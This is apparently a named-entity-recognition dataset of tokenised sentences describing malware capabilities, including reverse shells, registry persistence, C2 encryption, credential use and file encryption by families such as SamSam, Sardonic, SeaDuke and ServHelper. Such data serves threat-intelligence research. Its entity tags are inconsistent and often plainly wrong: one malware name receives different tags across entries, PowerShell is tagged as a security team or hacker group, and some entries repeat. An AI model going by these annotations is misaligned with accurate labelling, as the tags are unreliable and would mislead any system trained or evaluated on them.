"O", - "O" - ] - }, - { - "tokens": [ - "Sakula", - "calls", - "cmd.exe", - "to", - "run", - "various", - "DLL", - "files", - "via", - "rundll32", - "and", - "also", - "to", - "perform", - "file", - "cleanup.", - "Sakula", - "also", - "has", - "the", - "capability", - "to", - "invoke", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Sakula", - "samples", - "install", - "themselves", - "as", - "services", - "for", - "persistence", - "by", - "calling", - "WinExec", - "with", - "the", - "<code>net", - "start</code>", - "argument." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SamSam", - "has", - "used", - "garbage", - "code", - "to", - "pad", - "some", - "of", - "its", - "malware", - "components." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SamSam", - "encrypts", - "victim", - "files", - "using", - "RSA-2048", - "encryption", - "and", - "demands", - "a", - "ransom", - "be", - "paid", - "in", - "Bitcoin", - "to", - "decrypt", - "those", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SamSam", - "has", - "been", - "seen", - "using", - "AES", - "or", - "DES", - "to", - "encrypt", - "payloads", - "and", - "payload", - "components." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SamSam", - "has", - "been", - "seen", - "deleting", - "its", - "own", - "files", - "and", - "payloads", - "to", - "make", - "analysis", - "of", - "the", - "attack", - "more", - "difficult." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct", - "O", - "O" - ] - }, - { - "tokens": [ - "SamSam", - "uses", - "custom", - "batch", - "scripts", - "to", - "execute", - "some", - "of", - "its", - "components." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "compile", - "and", - "execute", - "downloaded", - "modules", - "at", - "runtime." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "leverage", - "an", - "exfiltration", - "module", - "to", - "download", - "arbitrary", - "files", - "from", - "compromised", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "encrypt", - "API", - "name", - "strings", - "with", - "an", - "XOR-based", - "algorithm." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "use", - "a", - "specific", - "module", - "for", - "file", - "enumeration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "has", - "been", - "used", - "to", - "deploy", - "other", - "malware", - "including", - "Ninja." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Samurai", - "has", - "created", - "the", - "directory", - "`%COMMONPROGRAMFILES%\\Microsoft", - "Shared\\wmi\\`", - "to", - "contain", - "DLLs", - "for", - "loading", - "successive", - "stages." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Samurai", - "loader", - "component", - "can", - "create", - "multiple", - "Registry", - "keys", - "to", - "force", - "the", - "svchost.exe", - "process", - "to", - "load", - "the", - "final", - "backdoor." - ], - "ner_tags": [ - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "has", - "the", - "ability", - "to", - "call", - "Windows", - "APIs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "use", - "a", - "proxy", - "module", - "to", - "forward", - "TCP", - "packets", - "to", - "external", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "encrypt", - "the", - "names", - "of", - "requested", - "APIs", - "and", - "deliver", - "its", - "final", - "payload", - "as", - "a", - "compressed,", - "encrypted", - "and", - "base64", - "encoded", - "blob." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "has", - "the", - "ability", - "to", - "proxy", - "connections", - "to", - "specified", - "remote", - "IPs", - "and", - "ports", - "through", - "a", - "a", - "proxy", - "module." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "query", - "`SOFTWARE\\Microsoft\\.NETFramework\\policy\\v2.0`", - "for", - "discovery." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "check", - "for", - "the", - "presence", - "and", - "version", - "of", - "the", - ".NET", - "framework." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "base64", - "encode", - "data", - "sent", - "in", - "C2", - "communications", - "prior", - "to", - "its", - "encryption." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "encrypt", - "C2", - "communications", - "with", - "AES." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "use", - "a", - ".NET", - "HTTPListener", - "class", - "to", - "receive", - "and", - "handle", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "use", - "a", - "remote", - "command", - "module", - "for", - "execution", - "via", - "the", - "Windows", - "command", - "line." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Samurai", - "can", - "create", - "a", - "service", - "at", - "`HKLM\\SOFTWARE\\Microsoft\\Windows", - "NT\\CurrentVersion\\SvcHost`", - "to", - "trigger", - "execution", - "and", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "send", - "a", - "random", - "64-byte", - "RC4", - "key", - "to", - "communicate", - "with", - "actor-controlled", - "C2", - "servers", - "by", - "using", - "an", - "RSA", - "public", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "can", - "use", - "the", - "`QueueUserAPC`", - "API", - "to", - "execute", - "shellcode", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "PowerShell", - "scripts", - "can", - "be", - "encrypted", - "with", - "RC4", - "and", - "compressed", - "using", - "Gzip." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "collect", - "data", - "from", - "a", - "compromised", - "machine", - "to", - "deliver", - "to", - "the", - "attacker." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Sardonic", - "can", - "first", - "decrypt", - "with", - "the", - "RC4", - "algorithm", - "using", - "a", - "hardcoded", - "decryption", - "key", - "before", - "decompressing." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "delete", - "created", - "WMI", - "objects", - "to", - "evade", - "detections." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "upload", - "additional", - "malicious", - "files", - "to", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "call", - "Win32", - "API", - "functions", - "to", - "determine", - "if", - "`powershell.exe`", - "is", - "running." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "execute", - "the", - "`net", - "view`", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "can", - "communicate", - "with", - "actor-controlled", - "C2", - "servers", - "by", - "using", - "a", - "custom", - "little-endian", - "binary", - "protocol." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "B-HackOrg", - "B-Tool", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "connect", - "with", - "actor-controlled", - "C2", - "servers", - "using", - "a", - "custom", - "binary", - "protocol", - "over", - "port", - "443." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "can", - "use", - "certain", - "ConfuserEx", - "features", - "for", - "obfuscation", - "and", - "can", - "be", - "encoded", - "in", - "a", - "base64", - "string." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "execute", - "PowerShell", - "commands", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "execute", - "the", - "`tasklist`", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "a", - "plugin", - "system", - "that", - "can", - "load", - "specially", - "made", - "DLLs", - "into", - "memory", - "and", - "execute", - "their", - "functions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "can", - "encode", - "client", - "ID", - "data", - "in", - "32", - "uppercase", - "hex", - "characters", - "and", - "transfer", - "to", - "the", - "actor-controlled", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "use", - "an", - "RC4", - "key", - "to", - "encrypt", - "communications", - "to", - "and", - "from", - "actor-controlled", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Idus", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "collect", - "the", - "computer", - "name,", - "CPU", - "manufacturer", - "name,", - "and", - "C:\\", - "drive", - "serial", - "number", - "from", - "a", - "compromised", - "machine.", - "Sardonic", - "also", - "has", - "the", - "ability", - "to", - "execute", - "the", - "`ver`", - "and", - "`systeminfo`", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "execute", - "the", - "`ipconfig`", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "execute", - "the", - "`netstat`", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "execute", - "the", - "`net", - "start`", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "has", - "the", - "ability", - "to", - "run", - "`cmd.exe`", - "or", - "other", - "interactive", - "processes", - "on", - "a", - "compromised", - "computer." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "can", - "use", - "WMI", - "to", - "execute", - "PowerShell", - "commands", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sardonic", - "can", - "use", - "a", - "WMI", - "event", - "filter", - "to", - "invoke", - "a", - "command-line", - "event", - "consumer", - "to", - "gain", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SeaDuke", - "compressed", - "data", - "with", - "zlib", - "prior", - "to", - "sending", - "it", - "over", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SeaDuke", - "can", - "securely", - "delete", - "files,", - "including", - "deleting", - "itself", - "from", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SeaDuke", - "is", - "capable", - "of", - "uploading", - "and", - "downloading", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Some", - "SeaDuke", - "samples", - "have", - "a", - "module", - "to", - "use", - "pass", - "the", - "ticket", - "with", - "Kerberos", - "for", - "authentication." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SeaDuke", - "uses", - "a", - "module", - "to", - "execute", - "Mimikatz", - "with", - "PowerShell", - "to", - "perform", - "Pass", - "the", - "Ticket." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SeaDuke", - "is", - "capable", - "of", - "persisting", - "via", - "the", - "Registry", - "Run", - "key", - "or", - "a", - ".lnk", - "file", - "stored", - "in", - "the", - "Startup", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "SeaDuke", - "samples", - "have", - "a", - "module", - "to", - "extract", - "email", - "from", - "Microsoft", - "Exchange", - "servers", - "using", - "compromised", - "credentials." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SeaDuke", - "is", - "capable", - "of", - "persisting", - "via", - "a", - ".lnk", - "file", - "stored", - "in", - "the", - "Startup", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SeaDuke", - "has", - "been", - "packed", - "with", - "the", - "UPX", - "packer." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SeaDuke", - "C2", - "traffic", - "is", - "base64-encoded." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SeaDuke", - "C2", - "traffic", - "has", - "been", - "encrypted", - "with", - "RC4", - "and", - "AES." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "SeaDuke", - "samples", - "have", - "a", - "module", - "to", - "extract", - "email", - "from", - "Microsoft", - "Exchange", - "servers", - "using", - "compromised", - "credentials." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SeaDuke", - "uses", - "HTTP", - "and", - "HTTPS", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "SeaDuke", - "is", - "capable", - "of", - "executing", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SeaDuke", - "uses", - "an", - "event", - "filter", - "in", - "WMI", - "code", - "to", - "execute", - "a", - "previously", - "dropped", - "executable", - "shortly", - "after", - "system", - "startup." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Seasalt", - "obfuscates", - "configuration", - "data." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Seasalt", - "has", - "a", - "command", - "to", - "delete", - "a", - "specified", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Seasalt", - "has", - "the", - "capability", - "to", - "identify", - "the", - "drive", - "type", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Seasalt", - "has", - "a", - "command", - "to", - "download", - "additional", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Seasalt", - "has", - "masqueraded", - "as", - "a", - "service", - "called", - "\"SaSaut\"", - "with", - "a", - "display", - "name", - "of", - "\"System", - "Authorization", - "Service\"", - "in", - "an", - "apparent", - "attempt", - "to", - "masquerade", - "as", - "a", - "legitimate", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Seasalt", - "has", - "a", - "command", - "to", - "perform", - "a", - "process", - "listing." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Seasalt", - "creates", - "a", - "Registry", - "entry", - "to", - "ensure", - "infection", - "after", - "reboot", - "under", - "<code>HKLM\\Software\\Microsoft\\Windows\\currentVersion\\Run</code>." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Seasalt", - "uses", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Seasalt", - "uses", - "cmd.exe", - "to", - "create", - "a", - "reverse", - "shell", - "on", - "the", - "infected", - "endpoint." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Seasalt", - "is", - "capable", - "of", - "installing", - "itself", - "as", - "a", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ServHelper", - "has", - "added", - "a", - "user", - "named", - "\"supportaccount\"", - "to", - "the", - "Remote", - "Desktop", - "Users", - "and", - "Administrators", - "groups." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-Purp", - "B-Org", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "ServHelper", - "may", - "set", - "up", - "a", - "reverse", - "SSH", - "tunnel", - "to", - "give", - "the", - "attacker", - "access", - "to", - "services", - "running", - "on", - "the", - "victim,", - "such", - "as", - "RDP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ServHelper", - "has", - "a", - "module", - "to", - "delete", - "itself", - "from", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ServHelper", - "may", - "download", - "additional", - "files", - "to", - "execute." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "ServHelper", - "has", - "created", - "a", - "new", - "user", - "named", - "\"supportaccount\"." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "ServHelper", - "has", - "the", - "ability", - "to", - "execute", - "a", - "PowerShell", - "script", - "to", - "get", - "information", - "from", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ServHelper", - "may", - "attempt", - "to", - "establish", - "persistence", - "via", - "the", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", - "run", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "ServHelper", - "has", - "commands", - "for", - "adding", - "a", - "remote", - "desktop", - "user", - "and", - "sending", - "RDP", - "traffic", - "to", - "the", - "attacker", - "through", - "a", - "reverse", - "SSH", - "tunnel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ServHelper", - "contains", - "a", - "module", - "for", - "downloading", - "and", - "executing", - "DLLs", - "that", - "leverages", - "<code>rundll32.exe</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Features", - "B-SamFile" - ] - }, - { - "tokens": [ - "ServHelper", - "contains", - "modules", - "that", - "will", - "use", - "schtasks", - "to", - "carry", - "out", - "malicious", - "operations." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ServHelper", - "will", - "attempt", - "to", - "enumerate", - "Windows", - "version", - "and", - "system", - "architecture." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ServHelper", - "will", - "attempt", - "to", - "enumerate", - "the", - "username", - "of", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ServHelper", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "ServHelper", - "can", - "execute", - "shell", - "commands", - "against", - "cmd." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Seth-Locker", - "can", - "encrypt", - "files", - "on", - "a", - "targeted", - "system,", - "appending", - "them", - "with", - "the", - "suffix", - ".seth." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "Seth-Locker", - "has", - "the", - "ability", - "to", - "download", - "and", - "execute", - "files", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Seth-Locker", - "can", - "execute", - "commands", - "via", - "the", - "command", - "line", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "used", - "DNS", - "tunneling", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "decrypted", - "a", - "binary", - "blob", - "to", - "start", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "uses", - "a", - "DGA", - "that", - "is", - "based", - "on", - "the", - "day", - "of", - "the", - "month", - "for", - "C2", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ShadowPad", - "has", - "injected", - "a", - "DLL", - "into", - "svchost.exe." 